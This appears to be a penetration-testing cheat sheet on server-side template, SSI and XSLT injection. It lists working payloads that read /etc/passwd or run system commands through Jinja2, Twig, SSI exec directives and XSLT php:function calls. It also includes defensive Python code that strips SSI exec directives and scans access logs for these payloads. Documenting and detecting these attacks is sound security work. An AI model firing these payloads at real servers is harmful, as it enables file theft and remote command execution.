Server Side Attacks (SSRF)
SSRF, SSTI and SSI injections.
Server-side Template Injection or SSTI
SSTI occurs when user input is inserted into the template source itself before rendering, so the template engine evaluates it, which allows code execution. As with SQL injection, we can probe for the vulnerability with arithmetic test expressions such as:
{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Find payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md
Local File Inclusion (LFI) Jinja2
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}
Remote Code Execution (RCE) Jinja2
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Local File Inclusion (LFI) Twig
{{ "/etc/passwd"|file_excerpt(1,-1) }}
Remote Code Execution (RCE) Twig
{{ ['id'] | filter('system') }}
SSI Injection
Server-Side Includes (SSI) are used by web apps to create dynamic content on HTML pages. The use of SSI is indicated when pages are served with these file extensions:
.shtml
.shtm
.stm
SSI uses directives consisting of:
name: the directive's name
parameter name: one or more parameters
value: one or more parameter values
Several payloads
<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->
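The directive grammar above (name, parameter names, quoted values) is small enough to parse exactly. The following is an added example, not part of the original notes: a parser for SSI directives plus an audit that classifies each one, so that a reviewer can find exec directives in user-supplied content before it is written to an .shtml page. The sample page, the blocked/flagged policy and the function names are assumptions made for the example; `include` and `echo` are standard directives used only as benign examples.

```python
import re

# Grammar from the notes: <!--#name param1="value1" param2="value2" -->
DIRECTIVE_RE = re.compile(
    r'<!--#\s*([A-Za-z]+)((?:\s+[A-Za-z_][A-Za-z0-9_]*="[^"]*")*)\s*-->'
)
PARAM_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_]*)="([^"]*)"')

# Policy (assumed for this example): exec is blocked outright, printenv is
# flagged because it leaks environment data, everything else is allowed.
BLOCKED = {"exec"}
FLAGGED = {"printenv"}

# Constructed sample .shtml fragment mixing benign and dangerous directives.
SAMPLE_SHTML = """<html><body>
<!--#include virtual="/footer.shtml" -->
<!--#echo var="DATE_LOCAL" -->
<!--#printenv -->
<!--#exec cmd="whoami" -->
</body></html>"""


def parse_ssi(html):
    """Return [(name, {param: value}), ...] for every SSI directive found."""
    out = []
    for m in DIRECTIVE_RE.finditer(html):
        name = m.group(1).lower()
        params = dict(PARAM_RE.findall(m.group(2)))
        out.append((name, params))
    return out


def audit_ssi(html):
    """Classify each directive as 'blocked', 'flagged' or 'allowed'."""
    result = []
    for name, params in parse_ssi(html):
        if name in BLOCKED:
            verdict = "blocked"
        elif name in FLAGGED:
            verdict = "flagged"
        else:
            verdict = "allowed"
        result.append((name, params, verdict))
    return result


def strip_dangerous_ssi(html):
    """Remove blocked directives from a fragment before it reaches an SSI-parsed page."""
    def repl(m):
        return "" if m.group(1).lower() in BLOCKED else m.group(0)
    return DIRECTIVE_RE.sub(repl, html)


if __name__ == "__main__":
    for name, params, verdict in audit_ssi(SAMPLE_SHTML):
        print(f"{verdict:8} {name} {params}")
```

Stripping is a last line of defence; the stronger control is to keep user input out of SSI-parsed files altogether, and on Apache to disable command execution with `Options IncludesNOEXEC` so that `exec` is never honoured.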
XSLT Injections
Extensible Stylesheet Language Transformations (XSLT) is used to select specific nodes from an XML document and transform the document's structure. If user input ends up inside a stylesheet, the engine's built-in and extension functions become reachable.
# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
# RCE
<xsl:value-of select="php:function('system','id')" />
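The SSTI probes and Jinja2/Twig payload fragments listed earlier, and the XSLT function calls above, share a recognisable shape that a defender can look for in request logs. The following is an added example, not part of the original notes, covering both sections: a scanner that URL-decodes each query parameter and matches it against signatures derived only from the strings shown on this page. The access-log lines are constructed for the example (Apache combined format is assumed), as are the function names and category labels.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Signatures derived from the probe syntaxes and payload fragments in the notes.
SIGNATURES = {
    "ssti_probe": [
        r"\{\{\s*\d+\s*\*\s*'?\d+'?\s*\}\}",    # {{7*7}}, {{7*'7'}}
        r"\$\{\{?\s*\d+\s*\*\s*\d+\s*\}?\}",    # ${7*7}, ${{7*7}}
        r"<%=\s*\d+\s*\*\s*\d+\s*%>",            # <%= 7*7 %>
        r"#\{\s*\d+\s*\*\s*\d+\s*\}",            # #{7*7}
    ],
    "ssti_jinja2": [r"__globals__", r"__builtins__", r"__import__\s*\(", r"\.popen\s*\("],
    "ssti_twig": [r"\|\s*filter\s*\(\s*'system'", r"\|\s*file_excerpt\s*\("],
    "xslt": [r"unparsed-text\s*\(", r"php:function\s*\("],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats] for cat, pats in SIGNATURES.items()}

# Constructed sample access log (Apache combined format assumed).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /profile?name=alice HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /profile?name=%7B%7B%20self.__init__.__globals__'
    '.__builtins__.__import__(%27os%27).popen(%27id%27).read()%20%7D%7D HTTP/1.1" 200 700',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "POST /transform?xsl=%3Cxsl:value-of%20select=%22'
    'php:function(%27system%27,%27id%27)%22/%3E HTTP/1.1" 500 88',
    '203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /search?q=price%2A2 HTTP/1.1" 200 300',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_value(value):
    """Return the set of signature categories matched by one parameter value.

    The value is URL-decoded twice so single- and double-encoded payloads
    are compared in their decoded form.
    """
    decoded = unquote_plus(unquote_plus(value))
    return {cat for cat, pats in COMPILED.items() if any(p.search(decoded) for p in pats)}


def scan_access_log(lines):
    """Return (client_ip, path, sorted categories) for every request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, target, _status = m.groups()
        path, _, query = target.partition("?")
        cats = set()
        for _key, val in parse_qsl(query, keep_blank_values=True):
            cats |= scan_value(val)
        if cats:
            hits.append((ip, path, sorted(cats)))
    return hits


if __name__ == "__main__":
    for ip, path, cats in scan_access_log(SAMPLE_LOG):
        print(f"{ip:15} {path:12} {', '.join(cats)}")
```

A hit on `ssti_probe` is typically reconnaissance (the arithmetic probes are harmless on their own), whereas the `ssti_jinja2`, `ssti_twig` and `xslt` categories indicate an attempt at file read or command execution and deserve immediate triage. Signatures like these catch the textbook strings; the real fix is never to place user input into template or stylesheet source, and to pass it to the engine as data instead.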